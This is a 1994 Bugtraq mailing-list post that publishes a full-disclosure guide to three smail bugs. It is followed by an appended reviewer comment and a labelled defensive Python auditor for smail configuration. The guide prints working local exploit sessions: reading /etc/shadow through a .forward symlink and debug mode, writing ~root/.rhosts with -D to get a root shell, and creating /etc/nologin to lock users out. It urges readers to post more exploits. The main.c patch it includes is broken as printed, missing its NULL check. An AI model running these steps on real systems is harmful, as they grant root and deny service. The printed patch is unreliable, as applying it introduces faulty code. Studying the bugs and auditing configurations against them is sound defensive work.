Bugtraq mailing list archives
Re: 3 SMAIL BUGS
From: xcelsior () altair csustan edu (Excelsior)
Date: Sun, 9 Oct 94 00:09:02 PDT
aleph1 () dfw net (Aleph One) spewed....

> Ok, for all of you asking which are the 3, here is the count down:
>
> Number 3 - The SMTP DEBUG problem. Anyone can telnet to your SMTP port
> and read any file on the system.

You are exaggerating the problem. To exploit this, you have to have an
account on the local machine (in order to create the ~/.forward link).
Not just "anyone" can exploit it.

> Fixed by adding -smtp_debug in your smail config file.

Wrong wrong wrong! All the -smtp_debug flag does is keep you from
exploiting it by telnetting directly to the smtp port. There is an
easier way to exploit it.

> Number 2 - The .forward problem. Another configuration problem. Smail
> does not check file attributes when delivering mail
                 ^^^^^^^^^^^^^^^

Wrong again. It does check the file attributes, but not the attributes
of the DIRECTORY you are trying to create the file in - thus causing the
problem.

> to a file pointed to by a .forward. Fixed by adding the check_path
> attribute to the forward file director.
>
> and Number 1 - Debug file bug. Smail creates or appends to any file
> using the debug options!

How about explaining those bugs in detail? If I wanted to hear "There is
a bug" with no explanation, I'd read CERT. Maybe you don't know how the
bugs work, but if you do, don't be a WUSS - post it!

> There. What I said will fix #1 and #2.

Nope, what you said will definitely NOT fix #1 or #3. You can fix #2 as
you described, but you weren't very specific about it, were you?

> Several different patches have been posted for #3 on usenet. Check
> comp.mail.smail and the comp.os.linux.* newsgroups. Also
> the maintainers of smail will fixed RSN.
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Isn't that a little harsh? How about just giving them a course in
writing secure Setuid programs. :)

Ok, now everyone repeat after me:

    BUGTRAQ IS A FULL DISCLOSURE LIST

That's right. FULL disclosure. Since all the elite cracker pussies are
too scared to describe their bugs in detail, I will. I am including a
security doc on smail that I wrote a little while ago. I'm sure most of
the cracker dudes got it from my DocServer and FTP site, so here it
comes to the rest of you. I hope this encourages more people to stop
being childish and post your bugs. I'll be posting more goodies from my
archives soon as well.

Share and enjoy.... :)

-------------------------------------------------

EXCELSIOR'S GUIDE TO SMAIL BUGS - Sept 1994

*** Bug #1 ***

SYNOPSIS
--------

Use of ~/.forward and debug lets a local user read any file on the
system.

EXAMPLE OF EXPLOITATION
-----------------------

loser@possesux ~> ln -s /etc/shadow .forward
loser@possesux ~> ls -la .forward
lrwxrwxrwx   1 loser    users          11 Sep  5 12:08 .forward -> /etc/shadow
loser@possesux ~> telnet localhost smtp
Trying 127.0.0.1...
Connected to localhost-gw.
Escape character is '^]'.
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:10 PDT
debug 20
250 Debugging level: 20
expn loser
[lots of crap]
expand_string(~/.forward, /home/loser, loser) called
expand_string returns /home/loser/.forward
dtd_forwardfile: opening forward file /home/loser/.forward
[more crap]
read 890 bytes
director dotforward: matched loser, forwarded to root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7:::
[....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 loser ... not matched
quit
221 possesux.warez.mil closing connection
Connection closed by foreign host.

---------------

Contrary to popular belief, adding -smtp_debug to your smail config file
will NOT prevent this bug from occurring. It will just prevent
exploitation via the smtp port. We can just do this....

----------

loser@possesux ~> smail -bs -v20
expand_string($primary_name Smail$version ready for fakemail on $date,(null), (null)) called
expand_string returns possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:15 PDT
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:15 PDT
expn loser
[same crap as before]
expand_string(~/.forward, /home/loser, loser) called
expand_string returns /home/loser/.forward
dtd_forwardfile: opening forward file /home/loser/.forward
[more of same crap]
read 890 bytes
director dotforward: matched loser, forwarded to root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7:::
[.....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 loser ... not matched
quit
221 possesux.warez.mil closing connection

----------

The easy way to fix this is to nuke the -d and -v options from smail.

*** Bug #2 ***

SYNOPSIS
--------

Smail called with the -D flag will allow you to create and append to any
file on the system.

EXAMPLE OF EXPLOITATION
-----------------------

loser@possesux ~> cat ~/.forward
localhost loser
^D
loser@possesux ~> smail -bs -D ~root/.rhosts -v20
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:23 PDT
expn loser
250 loser
quit
221 possesux.warez.mil closing connection
loser@possesux ~> rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
# id
uid=0(root) gid=0(root)

--------------

Neat, huh? Patch by nuking the -D option from smail. I received the
following patch recently. I haven't tested it, so use at your own risk.

*** Omain.c     Wed Mar 11 12:33:18 1993
--- main.c      Wed Mar 11 12:59:54 1993
***************
*** 436,458 ****
  }
  
- /*
-  * change error file to debugging file from -D option, if any
-  */
- 
- if (arg_debug_file) {
-     new_errfile = fopen(arg_debug_file, "a");
-     if (new_errfile == NULL) {
-         write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
-                   arg_debug_file, strerrno(errno));
-         arg_debug_file = NULL;
-     } else {
-         errfile = new_errfile;
-         fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
-                 program, (long)getpid());
-     }
- }
- 
  /*
   * read in the transport, router and director files, if needed
   *
   * NOTE: if queue_only is FALSE and mode is DELIVER_MAIL,
--- 436,441 ----
***************
*** 525,530 ****
--- 508,537 ----
  if (prog_euid != REQUIRED_EUID)
      queue_only = TRUE;
  #endif
+ 
+ /*
+  * change error file to debugging file from -D option, if any
+  *
+  * JMJ: Change location of this fragment to below the setuid/setgid
+  * calls to allow for use of fopen_as_user() instead of just
+  * fopen().
+  *
+  * Side effect: -D now requires full pathname to debug file
+  */
+ 
+ if (arg_debug_file) {
+     new_errfile = fopen_as_user(arg_debug_file, "a", 1, real_uid,
+                                 prog_egid, 0600);
+         write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
+                   arg_debug_file, strerrno(errno));
+         arg_debug_file = NULL;
+     } else {
+         errfile = new_errfile;
+         fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
+                 program, (long)getpid());
+     }
+ }
  
  /*
   * error processing can be other than TERMINAL only for
--

*** Bug #3 ***

SYNOPSIS
--------

Files specified in ~/.forward can be created in any directory,
regardless of its permissions. (File is still owned by mailbox owner,
however.)

EXAMPLE OF EXPLOITATION
-----------------------

loser@possesux ~> echo "/etc/nologin" > ~/.forward
loser@possesux ~> mail -r root loser < /dev/null
loser@possesux ~> echo "Site shutdown due to smail lameness" >! /etc/nologin
loser@possesux ~> rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.

---------

Plug up this hole by adding 'check_path' to the following part of your
/usr/lib/smail/transports file:

---
[...]
# file - deliver mail to files
#
# This is used implicitly when smail encounters addresses which begin with
# a slash or squiggle character, such as "/usr/info/list_messages" or
# perhaps "~/Mail/inbox".
file:   driver = appendfile,
        return_path, local, from, unix_from_hack;

        file = $user,           # file is taken from address
        append_as_user,         # use user-id associated with address
        expand_user,            # expand ~ and $ within address
        check_path,             #<--add this line
        suffix = "\n",
        mode = 0644
[...]
---

That's it for now. If you appreciated reading this file, then consider
posting your exploitation scripts too. Share and enjoy!

- Excelsior
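Review bot: the relocated -D block in the second hunk of the main.c patch (--- 508,537 ----) has lost the `if (new_errfile == NULL) {` line that the removed block at *** 436,458 **** had right after the fopen() call. As printed, the `write_log` warning and `arg_debug_file = NULL;` run unconditionally whenever -D is given, the `} else {` pairs with `if (arg_debug_file)`, and the braces no longer balance; the hunk header promises 30 lines but only 23 added lines plus 6 context lines appear, so exactly one line is missing. Restore the NULL check before applying. The part of the change that addresses Bug #2 is moving the block below the setuid/setgid calls so that fopen_as_user(arg_debug_file, "a", 1, real_uid, prog_egid, 0600) opens the file with the caller's privileges instead of smail's; the side effect noted in the comment (-D now requires a full pathname) belongs in the documentation as well as the comment.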
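As an added example (not part of Excelsior's post or of the smail sources), the following Python auditor checks the two configuration points the guide comes down to: whether the appendfile transport in `transports` carries `check_path` (Bug #3 depends on its absence), and whether a user's ~/.forward is a symlink or delivers to a file outside that user's home (the shapes Bug #1 and Bug #3 use). It assumes the stanza grammar exactly as the post shows it (`name: attr, attr = value; ...` with `#` comments) and that an address beginning with `/` or `~` is a file delivery, as the transports comment states; all sample input is constructed here.

```python
"""Audit helpers for the smail hardening points discussed above.

Added example, not code from the original post or from the smail project.
Assumptions: the `transports` grammar is as the post shows it
(`name: attr, attr = value; attr, ...` with `#` comments), and a ~/.forward
address beginning with `/` or `~` is a file delivery. All sample input is
constructed here, not taken from a real system.
"""
import os
import re

# Constructed sample: the post's `file` transport before check_path is added.
TRANSPORTS_WEAK = """\
# file - deliver mail to files
file:   driver = appendfile,
        return_path, local, from, unix_from_hack;

        file = $user,           # file is taken from address
        append_as_user,         # use user-id associated with address
        expand_user,            # expand ~ and $ within address
        suffix = "\\n",
        mode = 0644
"""

# The same stanza with the fix from the post applied.
TRANSPORTS_FIXED = TRANSPORTS_WEAK.replace(
    "        expand_user,", "        expand_user,\n        check_path,")


def parse_transports(text):
    """Return {name: {"attrs": set, "values": dict}} for each stanza.

    A stanza starts with `name:` at the start of a line. Items are split on
    `,` and `;`; `k = v` items go to "values", bare flags to "attrs".
    """
    stanzas, current = {}, None
    for line in text.splitlines():
        line = line.split("#", 1)[0]          # drop trailing comments
        m = re.match(r"^(\w+):\s*(.*)$", line)
        if m:
            current = m.group(1)
            stanzas[current] = {"attrs": set(), "values": {}}
            line = m.group(2)
        if current is None:
            continue
        for item in re.split(r"[,;]", line):
            item = item.strip()
            if not item:
                continue
            if "=" in item:
                k, v = (s.strip() for s in item.split("=", 1))
                stanzas[current]["values"][k] = v.strip('"')
            else:
                stanzas[current]["attrs"].add(item)
    return stanzas


def file_transport_findings(text):
    """Flag appendfile transports without check_path (the setting whose
    absence Bug #3 relies on) and any world-writable file mode."""
    findings = []
    for name, st in parse_transports(text).items():
        if st["values"].get("driver") != "appendfile":
            continue
        if "check_path" not in st["attrs"]:
            findings.append(f"{name}: appendfile transport lacks check_path")
        mode = st["values"].get("mode")
        if mode and int(mode, 8) & 0o002:
            findings.append(f"{name}: mode {mode} is world-writable")
    return findings


def forward_file_findings(entries, home, link_target=None):
    """Audit one user's ~/.forward without touching the filesystem.

    entries      addresses read from the file, one per item
    home         the owner's home directory
    link_target  where ~/.forward points if it is a symlink (Bug #1 used a
                 link to /etc/shadow), else None
    """
    findings = []
    if link_target is not None:
        findings.append(f".forward is a symlink to {link_target}")
    home = os.path.normpath(home)
    for addr in (e.strip() for e in entries):
        if not addr.startswith(("/", "~")):
            continue                          # not a file delivery
        if addr == "~" or addr.startswith("~/"):
            target = os.path.normpath(os.path.join(home, addr[2:]))
        elif addr.startswith("~"):
            findings.append(f"file delivery into another user's home: {addr}")
            continue
        else:
            target = os.path.normpath(addr)
        if os.path.commonpath([home, target]) != home:
            findings.append(f"file delivery outside home: {addr}")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", TRANSPORTS_WEAK), ("fixed", TRANSPORTS_FIXED)):
        print(label, file_transport_findings(cfg) or ["ok"])
    # Constructed .forward contents modelled on the post's Bug #3 example.
    print(forward_file_findings(["/etc/nologin"], "/home/loser"))
```

Run against a real `/usr/lib/smail/transports` the parser reports every appendfile transport, not only the one named `file`, so a site that added its own file-delivery transport is checked too; the .forward check is deliberately pure so it can be fed from a cron job that reads each home directory as root.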